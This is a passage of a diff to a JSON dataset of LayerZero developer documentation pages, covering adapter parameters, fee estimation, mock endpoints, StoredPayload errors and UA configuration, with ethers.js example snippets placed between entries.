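// Wire both directions: each contract must trust its counterpart.
// localApp/remoteApp are ethers.Contract instances (placeholders).
const path = ethers.utils.solidityPack(
  ["address", "address"],
  [remoteApp.address, localApp.address] // remote first, then local
);
await (await localApp.setTrustedRemote(remoteChainId, path)).wait();
// ...and make the mirror-image call on the remote chain's contract.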
solidity-examples/NonblockingLzApp.sol at main LayerZero-Labs/solidity-examples GitHub Previous Relayer Adapter Parameters Next - EVM Guides UA Custom Configuration Last modified 4mo ago", "labels": [ "Documentation" ] @@ -1498,7 +1498,7 @@ { "title": "Relayer Adapter Parameters", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/advanced/relayer-adapter-parameters", - "body": "Relayer Adapter Parameters Advanced relayer usage, and usage of _adapterParams Looking to Airdrop native gas tokens on a destination chain? Abstract: Every transaction costs a certain amount of gas. Since LayerZero delivers the destination transaction when a message is sent it must pay for that destination gas. A default of 200,000 gas is priced into the call for simplicity. As a message sender, your contract may use more or less than 200k on destination. To instruct LayerZero to use a custom amount of gas, you must pass the adapterParams argument of send() or estimateFees() Version 1 - Example: You want to call estimateFees() and get a quote for a custom gas amount. Description Type Example Value version uint16 1 value uint256 200000 Encode the adapterParams and use them in the send() or estimateFees() function call: Heres an example of how to encode the adapterParams // v1 adapterParams, encoded for version 1 style, and 200k gas quote let adapterParams = ethers . utils . solidityPack ( [ 'uint16' , 'uint256' ], [ 1 , 200000 ] ) The resulting adapterParams should look like this (34 total bytes in length): 0x00010000000000000000000000000000000000000000000000000000000000030d40 The above adapterParams can be sent to send() (or estimateFees() ) to receive a quote for a non standard amount of gas for the destination lzReceive() . If your logic on the destination chain is very simple you may ask the Relayer to pay a bit less than the default. If your message logic on the destination if very gas intense you may be required to pay more than the default of 200k gasLimit. Airdrop Version 2 - Here is an example of how to encode the adapterParams for version 2, which may modify the default 200k gas, and instructs the Relayer to send native gas into a wallet address! Description Type Example Value version uint16 2 gasAmount uint 200000 nativeForDst uint 55555555555 addressOnDst address 0x1234512345123451234512345123451234512345 // v2 adapterParams, encoded for version 2 style // which can instruct the LayerZero message to give // destination 55555555555 wei of native gas into a specific wallet let adapterParams = ethers . utils . solidityPack ( [ \"uint16\" , \"uint\" , \"uint\" , \"address\" ], [ 2 , 200000 , 55555555555 , \"0x1234512345123451234512345123451234512345\" ] ) The above adapterParams can be sent to send() or estimateFees() to receive a quote for a non standard amount of gas for the destination lzReceive() and to give an amount of destination native gas to an address! // airdrop caps out at these values, per network (values shown imply 18 decimals) // Note: these values may change occasionally. Read onchain values in Relayer.sol for accuracy. ethereum : 0.24 bsc : 1.32 avalanche : 18.47 polygon : 681 arbitrum : 0.24 optimism : 0.24 fantom : 1304 swimmer : 30000 Previous Development Staging Next NonblockingLzApp Last modified 3mo ago", + "body": "Relayer Adapter Parameters Advanced relayer usage, and usage of _adapterParams Looking to Airdrop native gas tokens on a destination chain? Abstract: Every transaction costs a certain amount of gas. 
Since LayerZero delivers the destination transaction when a message is sent, it must pay for that destination gas. A default of 200,000 gas is priced into the call for simplicity. As a message sender, your contract may use more or less than 200k on destination. To instruct LayerZero to use a custom amount of gas, you must pass the adapterParams argument of send() or estimateFees(). Version 1 - Example: You want to call estimateFees() and get a quote for a custom gas amount. Description Type Example Value version uint16 1 value uint256 200000 Encode the adapterParams and use them in the send() or estimateFees() function call: Here's an example of how to encode the adapterParams // v1 adapterParams, encoded for version 1 style, and 200k gas quote let adapterParams = ethers . utils . solidityPack ( [ 'uint16' , 'uint256' ], [ 1 , 200000 ] ) The resulting adapterParams should look like this (34 total bytes in length): 0x00010000000000000000000000000000000000000000000000000000000000030d40 The above adapterParams can be sent to send() (or estimateFees() ) to receive a quote for a non-standard amount of gas for the destination lzReceive() . If your logic on the destination chain is very simple, you may ask the Relayer to pay a bit less than the default. If your message logic on the destination is very gas intense, you may be required to pay more than the default of 200k gasLimit. Airdrop Version 2 - Here is an example of how to encode the adapterParams for version 2, which may modify the default 200k gas, and instruct the Relayer to send native gas into a wallet address! Description Type Example Value version uint16 2 gasAmount uint 200000 nativeForDst uint 55555555555 addressOnDst address 0x1234512345123451234512345123451234512345 // v2 adapterParams, encoded for version 2 style // which can instruct the LayerZero message to give // destination 55555555555 wei of native gas into a specific wallet let adapterParams = ethers . utils . solidityPack ( [ \"uint16\" , \"uint\" , \"uint\" , \"address\" ], [ 2 , 200000 , 55555555555 , \"0x1234512345123451234512345123451234512345\" ] ) The above adapterParams can be sent to send() or estimateFees() to receive a quote for a non-standard amount of gas for the destination lzReceive() and to give an amount of destination native gas to an address! // airdrop caps out at these values, per network (values shown imply 18 decimals) // Note: these values may change occasionally. Read onchain values in Relayer.sol for accuracy. ethereum : 0.24 bsc : 1.32 avalanche : 18.47 polygon : 681 arbitrum : 0.24 optimism : 0.24 fantom : 1304 swimmer : 30000 Previous Development Staging Next NonblockingLzApp Last modified 6d ago", "labels": [ "Documentation" ] @@ -1506,7 +1506,7 @@ { "title": "Estimating Message Fees", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/code-examples/estimating-message-fees", - "body": "Estimating Message Fees Get the quantity of native gas token to pay to send a message Call estimateFees() to return a tuple containing the cross chain message fee. There are 2 values returned as a tuple via estimateFees(). Use the 0th index to get the fee in wei to pass as value to Endpoint.send() You do not need to implement this function. This is just to show how the fee is calculated by the endpoint for the send() function.
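For instance, a quote for a custom gas amount might look like this (a sketch, assuming ethers.js; endpoint is an ILayerZeroEndpoint instance and the other variables are placeholders):

// Quote a 500k-gas destination execution instead of the 200k default.
const adapterParams = ethers.utils.solidityPack(
  ["uint16", "uint256"],
  [1, 500000] // version 1, custom destination gas amount
);
const [nativeFee] = await endpoint.estimateFees(
  dstChainId, uaAddress, payload, false, adapterParams
);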
In solidity, you can use the ILayerZeroEndpoint.sol interface to call the view function to get the send() fees. Endpoint estimateFees() Set _payInZRO to false // Endpoint.sol estimateFees() returns the fees for the message function estimateFees ( uint16 _dstChainId , address _userApplication , bytes calldata _payload , bool _payInZRO , bytes calldata _adapterParams ) external view override returns ( uint nativeFee , uint zroFee ) { LibraryConfig storage uaConfig = uaConfigLookup [ _userApplication ]; ILayerZeroMessagingLibrary lib = uaConfig . sendVersion == DEFAULT_VERSION ? defaultSendLibrary : uaConfig . sendLibrary ; return lib . estimateFees ( _dstChainId , _userApplication , _payload , _payInZRO , _adapterParams ); } Our implementation of lib.estimateFees() illustrates how the total fee is calculated, which is the cumulative amount the oracle and relayer are collecting plus, potentially, a small protocol fee. // full estimateFees implementation function estimateFees ( uint16 _chainId , address _ua , bytes calldata _payload , bool _payInZRO , bytes calldata _adapterParams ) external view override returns ( uint nativeFee , uint zroFee ) { uint16 chainId = _chainId ; address ua = _ua ; uint payloadSize = _payload . length ; bytes memory adapterParam = _adapterParams ; ApplicationConfiguration memory uaConfig = getAppConfig ( chainId , ua ); // Relayer Fee uint relayerFee ; { if ( adapterParam . length == 0 ) { bytes memory defaultAdapterParam = defaultAdapterParams [ chainId ][ uaConfig . outboundProofType ]; relayerFee = ILayerZeroRelayer ( uaConfig . relayer ). getPrice ( chainId , uaConfig . outboundProofType , ua , payloadSize , defaultAdapterParam ); } else { relayerFee = ILayerZeroRelayer ( uaConfig . relayer ). getPrice ( chainId , uaConfig . outboundProofType , ua , payloadSize , adapterParam ); } } // Oracle Fee uint oracleFee = ILayerZeroOracle ( uaConfig . oracle ). getPrice ( chainId , uaConfig . outboundProofType ); // LayerZero Fee { uint protocolFee = treasuryContract . getFees ( _payInZRO , relayerFee , oracleFee ); _payInZRO ? zroFee = protocolFee : nativeFee = protocolFee ; } // return the sum of fees nativeFee = nativeFee . add ( relayerFee ). add ( oracleFee ); } Offchain Fee Estimation Example const fees = await endpoint . estimateFees ( dstChainId , // the destination LayerZero chainId uaContractAddress , // your contract address that calls Endpoint.send() \"0x\" , // empty payload false , // _payInZRO \"0x\" // default '0x' adapterParams, see: Relayer Adapter Param docs ) console . log ( ` fees[0] is the message fee in wei: ${ fees [ 0 ] } ` ) Check out adapterParams to customize the gas amount or airdrop native ETH! AdapterParams shows how to pack some additional settings to be used by estimateFees() and send() - it instructs LayerZero to use more gas which may be necessary to not run into a StoredPayload . Previous LZEndpointMock.sol Next PingPong.sol Last modified 3mo ago", + "body": "Estimating Message Fees Get the quantity of native gas token to pay to send a message Call estimateFees() to return a tuple containing the cross chain message fee. There are 2 values returned as a tuple via estimateFees(). Use the 0th index to get the fee in wei to pass as value to Endpoint.send() You do not need to implement this function. This is just to show how the fee is calculated by the endpoint for the send() function. 
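Connecting the quote to the send, a sketch (ethers.js assumed; the ua contract and its sendSomething method are placeholders for whatever your User Application exposes):

// Pass the quoted nativeFee as the transaction value.
// The parameters given to estimateFees() and send() must match.
const [nativeFee] = await endpoint.estimateFees(
  dstChainId, ua.address, payload, false, "0x"
);
await (await ua.sendSomething(dstChainId, payload, { value: nativeFee })).wait();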
The estimateFees() function returns a dynamic fee based on Oracle and Relayer prices for the destination chainId, your UserApplication contract, and payload parameters. In solidity, you can use the ILayerZeroEndpoint.sol interface to call the view function to get the send() fees. Endpoint estimateFees() Set _payInZRO to false // Endpoint.sol estimateFees() returns the fees for the message function estimateFees ( uint16 _dstChainId , address _userApplication , bytes calldata _payload , bool _payInZRO , bytes calldata _adapterParams ) external view override returns ( uint nativeFee , uint zroFee ) { LibraryConfig storage uaConfig = uaConfigLookup [ _userApplication ]; ILayerZeroMessagingLibrary lib = uaConfig . sendVersion == DEFAULT_VERSION ? defaultSendLibrary : uaConfig . sendLibrary ; return lib . estimateFees ( _dstChainId , _userApplication , _payload , _payInZRO , _adapterParams ); } Our implementation of lib.estimateFees() illustrates how the total fee is calculated, which is the cumulative amount the oracle and relayer are collecting plus, potentially, a small protocol fee. // full estimateFees implementation function estimateFees ( uint16 _chainId , address _ua , bytes calldata _payload , bool _payInZRO , bytes calldata _adapterParams ) external view override returns ( uint nativeFee , uint zroFee ) { uint16 chainId = _chainId ; address ua = _ua ; uint payloadSize = _payload . length ; bytes memory adapterParam = _adapterParams ; ApplicationConfiguration memory uaConfig = getAppConfig ( chainId , ua ); // Relayer Fee uint relayerFee ; { if ( adapterParam . length == 0 ) { bytes memory defaultAdapterParam = defaultAdapterParams [ chainId ][ uaConfig . outboundProofType ]; relayerFee = ILayerZeroRelayer ( uaConfig . relayer ). getPrice ( chainId , uaConfig . outboundProofType , ua , payloadSize , defaultAdapterParam ); } else { relayerFee = ILayerZeroRelayer ( uaConfig . relayer ). getPrice ( chainId , uaConfig . outboundProofType , ua , payloadSize , adapterParam ); } } // Oracle Fee uint oracleFee = ILayerZeroOracle ( uaConfig . oracle ). getPrice ( chainId , uaConfig . outboundProofType ); // LayerZero Fee { uint protocolFee = treasuryContract . getFees ( _payInZRO , relayerFee , oracleFee ); _payInZRO ? zroFee = protocolFee : nativeFee = protocolFee ; } // return the sum of fees nativeFee = nativeFee . add ( relayerFee ). add ( oracleFee ); } Offchain Fee Estimation Example const fees = await endpoint . estimateFees ( dstChainId , // the destination LayerZero chainId uaContractAddress , // your contract address that calls Endpoint.send() \"0x\" , // empty payload false , // _payInZRO \"0x\" // default '0x' adapterParams, see: Relayer Adapter Param docs ) console . log ( ` fees[0] is the message fee in wei: ${ fees [ 0 ] } ` ) Check out adapterParams to customize the gas amount or airdrop native ETH! AdapterParams shows how to pack some additional settings to be used by estimateFees() and send() - it instructs LayerZero to use more gas which may be necessary to not run into a StoredPayload . Previous LZEndpointMock.sol Next PingPong.sol Last modified 4mo ago", "labels": [ "Documentation" ] @@ -1514,7 +1514,7 @@ { "title": "LZEndpointMock.sol", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/code-examples/lzendpointmock.sol", - "body": "LZEndpointMock.sol A mock LayerZero endpoint contract for local testing. To enable testing locally we provide a mock that emulates a real endpoint. 
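A local wiring sketch (hardhat + ethers assumed; setDestLzEndpoint is the mock's helper in the solidity-examples repo, and the MyOmniApp factory name is a placeholder):

// Deploy one mock endpoint per simulated chain and point them at each other.
const Mock = await ethers.getContractFactory("LZEndpointMock");
const srcEndpoint = await Mock.deploy(1); // mock chainId 1
const dstEndpoint = await Mock.deploy(2); // mock chainId 2
const App = await ethers.getContractFactory("MyOmniApp"); // placeholder UA
const srcApp = await App.deploy(srcEndpoint.address);
const dstApp = await App.deploy(dstEndpoint.address);
// Tell each mock where the counterpart UA's endpoint lives.
await srcEndpoint.setDestLzEndpoint(dstApp.address, dstEndpoint.address);
await dstEndpoint.setDestLzEndpoint(srcApp.address, srcEndpoint.address);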
It has a send() method just like a real endpoint on main/test networks and it forwards the payload straight to the lzReceive() function (so you dont need a production oracle or relayer -- allowing you to test the contract logic easily). This contract helps the LayerZero team with our own testing! solidity-examples/LZEndpointMock.sol at main LayerZero-Labs/solidity-examples GitHub Previous OmniCounter.sol Next Estimating Message Fees Last modified 1yr ago", + "body": "LZEndpointMock.sol A mock LayerZero endpoint contract for local testing. To enable testing locally we provide a mock that emulates a real endpoint. It has a send() method just like a real endpoint on main/test networks and it forwards the payload straight to the lzReceive() function (so you don't need a production oracle or relayer -- allowing you to test the contract logic easily). This contract helps the LayerZero team with our own testing! https://github.com/LayerZero-Labs/solidity-examples/blob/main/contracts/lzApp/mocks/LZEndpointMock.sol Previous OmniCounter.sol Next Estimating Message Fees Last modified 21d ago", "labels": [ "Documentation" ] @@ -1530,7 +1530,7 @@ { "title": "PingPong.sol", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/code-examples/pingpong.sol", - "body": "PingPong.sol Demonstrate an onchain call to estimateFees() and a \"recursive\" call within lzReceive() This example contract demonstrates: estimateFees() : how to get the message fee on chain call send() within lzReceive() using a contract to pay the message fee (as opposed to the msg.sender) Warning: This contract will continuously send calls between two chains until one of them runs out of gas! solidity-examples/PingPong.sol at main LayerZero-Labs/solidity-examples GitHub PingPong.sol Previous Estimating Message Fees Next - EVM Guides Interfaces Last modified 3mo ago", + "body": "PingPong.sol Demonstrate an onchain call to estimateFees() and a \"recursive\" call within lzReceive() This example contract demonstrates: estimateFees() : how to get the message fee on chain; calling send() within lzReceive() ; and using a contract to pay the message fee (as opposed to the msg.sender). Warning: This contract will continuously send calls between two chains until one of them runs out of gas! solidity-examples/PingPong.sol at main LayerZero-Labs/solidity-examples GitHub PingPong.sol Previous Estimating Message Fees Next - EVM Guides Error Messages Last modified 21d ago", "labels": [ "Documentation" ] @@ -1538,7 +1538,7 @@ { "title": "Common Errors and Handling", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/error-messages/error-layerzero-relayer-fee-failed", - "body": "Common Errors and Handling The most common error is not sending the gas fee when calling send(..., {value: fee}) Are you getting this error when sending a message ? LayerZero: not enough native for fees When sending a message via the endpoint send() you must pass a value so LayerZero is compensated for the extra gas required to deliver the transaction to the destination chain. This msg.value refers to the parameter of the transaction that sends the native gas token. The parameters for estimateFees() and send() MUST be the same Rule of Thumb: if you have an estimateFee value that works, try to send a transaction with (value - 1). it should revert. You can get a quote for any LayerZero message.
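That rule of thumb as a test sketch (hardhat with chai matchers assumed; the ua contract and its sendSomething method are placeholders):

const { expect } = require("chai");
// If the quote is exact, one wei less than the fee should revert.
const [fee] = await endpoint.estimateFees(dstChainId, ua.address, payload, false, "0x");
await expect(
  ua.sendSomething(dstChainId, payload, { value: fee.sub(1) })
).to.be.revertedWith("LayerZero: not enough native for fees");
await ua.sendSomething(dstChainId, payload, { value: fee }); // exact fee succeeds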
Previous Fix a StoredPayload Next Failure Revert Messages Last modified 3mo ago", + "body": "Common Errors and Handling The most common error is not sending the gas fee when calling send(..., {value: fee}) Are you getting this error when sending a message? LayerZero: not enough native for fees When sending a message via the endpoint send(), you must pass a value so LayerZero is compensated for the extra gas required to deliver the transaction to the destination chain. This msg.value refers to the parameter of the transaction that sends the native gas token. The parameters for estimateFees() and send() MUST be the same. Rule of Thumb: if you have an estimateFee value that works, try to send a transaction with (value - 1); it should revert. You can get a quote for any LayerZero message. Previous Fix a StoredPayload Next Failure Revert Messages Last modified 4mo ago", "labels": [ "Documentation" ] @@ -1554,7 +1554,7 @@ { "title": "Fix a StoredPayload", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/error-messages/fix-a-storedpayload", - "body": "Fix a StoredPayload Manually fix a StoredPayload by sending a transaction on the destination chain. A StoredPayload contains the data for a message that ran out of gas (most likely) In order to deliver this message, once its stored, you must call a transaction on the Endpoint.sol called retryPayload Youll need 3 things: source Chain ID of the chain the message was sent from source UserApplication address UA payload If we refer back to here , we know how to get these 3 items. Or use a block explorer and find the destination trasaction, and look in the Logs tab. The Logs tab of most block explorers shows the StoredPayload event values. You will need the srcChainId, srcAddress, and payload Now we simply need an instance of the Endpoint contract on the destination chain. And to call the transaction, to \"unstick\" the StoredPayload. Heres a code snippet: // some ethers.js code to show how to deliver a StoredPayload let endpoint = await ethers . getContract ( \"Endpoint\" ) let srcChainId = 9 // trustedRemote is the remote + local format let trustedRemote = hre . ethers . utils . solidityPack ( [ 'address' , 'address' ], [ remoteContract . address , localContract . address ] ) let payload = \"0x000000...0000000000\" // copy and paste entire payload here let tx = await endpoint . retryPayload ( srcChainId , trustedRemote , payload ) Thats it! If your transaction succeeds, the StoredPayload should be cleared and messages will resume if you send another message across the pathway. If you get an error about invalid payload, you may have copied it wrong. Be sure to prefix the srcAddress and the payload with 0x so that ethers.js is happy. Previous StoredPayload Next Common Errors and Handling Last modified 3mo ago", + "body": "Fix a StoredPayload Manually fix a StoredPayload by sending a transaction on the destination chain. A StoredPayload contains the data for a message that (most likely) ran out of gas. In order to deliver this message, once it's stored, you must call a transaction on the Endpoint.sol called retryPayload. You'll need 3 things: source Chain ID of the chain the message was sent from source UserApplication address UA payload If we refer back to here , we know how to get these 3 items. Or use a block explorer and find the destination transaction, and look in the Logs tab. The Logs tab of most block explorers shows the StoredPayload event values.
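Before retrying, you can confirm the blockage on-chain (a sketch using the hasStoredPayload view shown in the StoredPayload section; the contract variables are placeholders):

// srcAddress is the 40-byte remote + local path, same format as setTrustedRemote.
const srcAddress = ethers.utils.solidityPack(
  ["address", "address"],
  [remoteContract.address, localContract.address]
);
const blocked = await endpoint.hasStoredPayload(srcChainId, srcAddress);
console.log(blocked ? "queue blocked - retryPayload needed" : "queue clear");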
You will need the srcChainId, srcAddress, and payload. Now we simply need an instance of the Endpoint contract on the destination chain, and to call the transaction to \"unstick\" the StoredPayload. Here's a code snippet: // some ethers.js code to show how to deliver a StoredPayload let endpoint = await ethers . getContract ( \"Endpoint\" ) let srcChainId = 9 // trustedRemote is the remote + local format let trustedRemote = hre . ethers . utils . solidityPack ( [ 'address' , 'address' ], [ remoteContract . address , localContract . address ] ) let payload = \"0x000000...0000000000\" // copy and paste entire payload here let tx = await endpoint . retryPayload ( srcChainId , trustedRemote , payload ) That's it! If your transaction succeeds, the StoredPayload should be cleared and messages will resume if you send another message across the pathway. If you get an error about invalid payload, you may have copied it wrong. Be sure to prefix the srcAddress and the payload with 0x so that ethers.js is happy. Previous StoredPayload Next Common Errors and Handling Last modified 4mo ago", "labels": [ "Documentation" ] @@ -1562,7 +1562,7 @@ { "title": "StoredPayload", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/error-messages/storedpayload", - "body": "StoredPayload If a message arrives at the destination and reverts or runs out of gas during execution it is saved on the destination side. Anyone can go to the destination chain and pay for the transaction to be retried, however if there is a logical error it may need to be force ejected. StoredPayloads will block the nonce-ordered flow of messages. You can check for a StoredPayload using the Endpoint.sol's hasStoredPayload function, supplying the source chainId and source User Application address (which is in the TrustedRemote 40byte format). Check for StoredPayload // Endpoint.sol check for StoredPayload function hasStoredPayload ( uint16 _srcChainId , bytes calldata _srcAddress ) external view override returns ( bool ) { StoredPayload storage sp = storedPayload [ _srcChainId ][ _srcAddress ]; return sp . payloadHash != bytes32 ( 0 ); } To clear a StoredPayload, call retryPayload on the message that was stored, on the destination chain. You should call this function on the Endpoint . // Endpoint.sol function retryPayload ( uint16 _srcChainId , bytes calldata _srcAddress , bytes calldata _payload ) external override receiveNonReentrant { ... } Note: most block explorers will show the payload parameter in the Logs tab, which could make it easy to find in the case you need to call retryPayload to unblock the queue. Also, you may implement your UA as the NonblockingLzApp which is an option offered that allows messages to flow regardless of error (which will all be stored on the destination to be dealt with anytime) Force eject the StoredPayload, unblocking the queue by DESTROYING (see: be very careful) the transaction forever. This is a very powerful function, and only the User Application onlyOwner can perform it. // Endpoint.sol function forceResumeReceive ( uint16 _srcChainId , bytes calldata _srcAddress ) external override onlyOwner { Fix a Stored Payload Go here for information on fixing a StoredPayload EVM Guides - Previous Error Messages Next StoredPayload Detection Last modified 2mo ago", + "body": "StoredPayload If a message arrives at the destination and reverts or runs out of gas during execution, it is saved on the destination side.
Anyone can go to the destination chain and pay for the transaction to be retried, however if there is a logical error it may need to be force ejected. StoredPayloads will block the nonce-ordered flow of messages. You can check for a StoredPayload using the Endpoint.sol's hasStoredPayload function, supplying the source chainId and source User Application address (which is in the TrustedRemote 40byte format). Check for StoredPayload // Endpoint.sol check for StoredPayload function hasStoredPayload ( uint16 _srcChainId , bytes calldata _srcAddress ) external view override returns ( bool ) { StoredPayload storage sp = storedPayload [ _srcChainId ][ _srcAddress ]; return sp . payloadHash != bytes32 ( 0 ); } To clear a StoredPayload, call retryPayload on the message that was stored, on the destination chain. You should call this function on the Endpoint . // Endpoint.sol function retryPayload ( uint16 _srcChainId , bytes calldata _srcAddress , bytes calldata _payload ) external override receiveNonReentrant { ... } Note: most block explorers will show the payload parameter in the Logs tab, which could make it easy to find in the case you need to call retryPayload to unblock the queue. Also, you may implement your UA as the NonblockingLzApp which is an option offered that allows messages to flow regardless of error (which will all be stored on the destination to be dealt with anytime) Force eject the StoredPayload, unblocking the queue by DESTROYING (see: be very careful) the transaction forever. This is a very powerful function, and only the User Application onlyOwner can perform it. // Endpoint.sol function forceResumeReceive ( uint16 _srcChainId , bytes calldata _srcAddress ) external override onlyOwner { Fix a Stored Payload Go here for information on fixing a StoredPayload EVM Guides - Previous Error Messages Next StoredPayload Detection Last modified 3mo ago", "labels": [ "Documentation" ] @@ -1570,15 +1570,7 @@ { "title": "StoredPayload Detection", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/error-messages/storedpayload-detection", - "body": "StoredPayload Detection Find the hidden reason for a StoredPayload What does a StoredPayload look like on chain & How to deal with it If you see a transaction like this, then you may have a StoredPayload: https://optimistic.etherscan.io/tx/0xd3229bfe9bb64425eef6457e1198e7c2d96c3abc1721e2b0846459a291d1ff60 optimistic.etherscan.io Example StoredPayload Tx See the orange text? Although the transaction may say it succeeded, LayerZero may have a StoredPayload blocking the queue of message until dealt with. Go to the \"Logs\" tab to see the reason If there is no reason string, it could be out of gas. If there is a reason copy the bytes into a hex-to-string converter to see the reason (example below): LzReceiver: invalid source sending contract OK! Thats some helpful information - Although we ran into a StoredPayload, we now know the reason: LzReceiver: invalid source sending contract The error reminds us that we must setTrustedRemote first on the destination to allow inbound communication from the source sending User Application contract. 
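The hex-to-string step can also be done with ethers (a sketch; reasonBytes stands for the hex string copied from the Logs tab):

// Convert the logged reason bytes into a readable string.
const reason = ethers.utils.toUtf8String(reasonBytes);
console.log(reason); // e.g. "LzReceiver: invalid source sending contract"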
Previous StoredPayload Next Fix a StoredPayload Last modified 3mo ago", - "labels": [ - "Documentation" - ] - }, - { - "title": "EVM (Solidity) Interfaces", - "html_url": "https://layerzero.gitbook.io/docs/evm-guides/interfaces/evm-solidity-interfaces", - "body": "EVM (Solidity) Interfaces User Application ILayerZeroEndpoint.sol ILayerZeroReceiver.sol ILayerZeroUserApplicationConfig.sol ILayerZeroEndpointLibrary.sol ILayerZeroLibraryReceiver.sol Oracle ILayerZeroOracle.sol Relayer ILayerZeroRelayer.sol These interfaces can be found in the LayerZero GitHub : ILayerZeroValidationLibrary.sol ILayerZeroUltraLightNodeV1.sol ILayerZeroValidationLibrary.sol EVM Guides - Previous Interfaces Next ILayerZeroReceiver Last modified 3mo ago", + "body": "StoredPayload Detection Find the hidden reason for a StoredPayload What does a StoredPayload look like on chain & How to deal with it If you see a transaction like this, then you may have a StoredPayload: https://optimistic.etherscan.io/tx/0xd3229bfe9bb64425eef6457e1198e7c2d96c3abc1721e2b0846459a291d1ff60 optimistic.etherscan.io Example StoredPayload Tx See the orange text? Although the transaction may say it succeeded, LayerZero may have a StoredPayload blocking the queue of message until dealt with. Go to the \"Logs\" tab to see the reason If there is no reason string, it could be out of gas. If there is a reason copy the bytes into a hex-to-string converter to see the reason (example below): LzReceiver: invalid source sending contract OK! Thats some helpful information - Although we ran into a StoredPayload, we now know the reason: LzReceiver: invalid source sending contract The error reminds us that we must setTrustedRemote first on the destination to allow inbound communication from the source sending User Application contract. Previous StoredPayload Next Fix a StoredPayload Last modified 4mo ago", "labels": [ "Documentation" ] @@ -1586,7 +1578,7 @@ { "title": "OFT", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-omnichain-contracts/oft", - "body": "OFT Omnichain Fungible Token Here are the articles in this section: IERC165 OFT Interface Ids OFT (V1) vs OFTV2 - Which should I use? OFT (V1) OFTV2 EVM Guides - Previous LayerZero Omnichain Contracts Next IERC165 OFT Interface Ids Last modified 7mo ago", + "body": "OFT Omnichain Fungible Token Here are the articles in this section: IERC165 OFT Interface Ids OFT (V1) vs OFTV2 - Which should I use? OFT (V1) OFTV2 EVM Guides - Previous LayerZero Omnichain Contracts Next IERC165 OFT Interface Ids Last modified 6d ago", "labels": [ "Documentation" ] @@ -1594,7 +1586,7 @@ { "title": "ONFT", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-omnichain-contracts/onft", - "body": "ONFT Omnichain NonFungible Token Here are the articles in this section: 721 1155 Previous OFTV2 Next 721 Last modified 7mo ago", + "body": "ONFT Omnichain NonFungible Token Here are the articles in this section: 721 1155 Previous OFTV2 Next 721 Last modified 20d ago", "labels": [ "Documentation" ] @@ -1602,7 +1594,7 @@ { "title": "UA Configuration", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-tooling/ua-configuration", - "body": "UA Configuration Describes the available config options in the appConfig.json Tasks The package adds the following tasks: getDefaultConfig returns the default configuration for the specified chains. Usage: npx hardhat getDefaultConfig --networks ethereum,bsc,polygon,avalanche getConfig returns the configuration of the specified contract. 
Parameters: address - the contract address. An optional parameter. Either contract name or contract address must be specified. name - the contract name. An optional parameter. It must be specified only if the contract was deployed using hardhat-deploy and the deployments information is located in the deployments folder. network - the network the contract is deployed to. remote-networks - a comma separated list of remote networks the contract is configured with. Usage: npx hardhat getConfig --network ethereum --remote-networks bsc,polygon,avalanche --name OFT setConfig sets the configuration of the specified contract. Parameters: config-path - the relative path to a file containing the configuration. address - the address of the deployed contracts. An optional parameter. It should be provided if the contract address is the same on all chains. For contracts with different addresses, specify the address for each chain in the config. name - the name of the deployed contracts. An optional parameter. It should be provided only if the same contract deployed on all chains using hardhat-deploy and the deployment information is located in the deployments folder. For contracts with different names, specify the name for each chain in the config. gnosis-config-path - the relative path to a file containing the gnosis configuration. An optional parameter. If specified, the transactions will be sent to Gnosis. Usage: npx hardhat setConfig --networks ethereum,bsc,avalanche --name OFT --config-path \"./appConfig.json\" --gnosis-config-path \"./gnosisConfig.json\" Below is an example of the application configuration { \"ethereum\" : { \"address\" : \"\" , \"name\" : \"ProxyOFT\" , \"sendVersion\" : 2 , \"receiveVersion\" : 2 , \"remoteConfigs\" : [ { \"remoteChain\" : \"bsc\" , \"inboundProofLibraryVersion\" : 1 , \"inboundBlockConfirmations\" : 20 , \"relayer\" : \"0x902F09715B6303d4173037652FA7377e5b98089E\" , \"outboundProofType\" : 1 , \"outboundBlockConfirmations\" : 15 , \"oracle\" : \"0x5a54fe5234E811466D5366846283323c954310B2\" }, { \"remoteChain\" : \"avalanche\" , \"inboundProofLibraryVersion\" : 1 , \"inboundBlockConfirmations\" : 12 , \"relayer\" : \"0x902F09715B6303d4173037652FA7377e5b98089E\" , \"outboundProofType\" : 1 , \"outboundBlockConfirmations\" : 15 , \"oracle\" : \"0x5a54fe5234E811466D5366846283323c954310B2\" } ] }, \"bsc\" : { \"address\" : \"0x0702c7B1b18E5EBf022e17182b52F0AC262A8062\" , \"name\" : \"\" , \"sendVersion\" : 2 , \"receiveVersion\" : 2 , \"remoteConfigs\" : [ { \"remoteChain\" : \"ethereum\" , \"inboundProofLibraryVersion\" : 1 , \"inboundBlockConfirmations\" : 15 , \"relayer\" : \"0xA27A2cA24DD28Ce14Fb5f5844b59851F03DCf182\" , \"outboundProofType\" : 1 , \"outboundBlockConfirmations\" : 20 , \"oracle\" : \"0x5a54fe5234E811466D5366846283323c954310B2\" } ] } } The top level elements represent chains the contracts are deployed to. The configuration section for each chain has the following fields: address - the contract address. An optional parameter. It should be provided if no address was specified in the task parameters. name - the contract name. An optional parameter. It should be provided only if the contract was deployed using hardhat-deploy and the deployment information is located in the deployments folder. sendVersion - the version of a messaging library contract used to send messages. If it isn't specified, the default version will be used. receiveVersion - the version of a messaging library contract used to receive messages. 
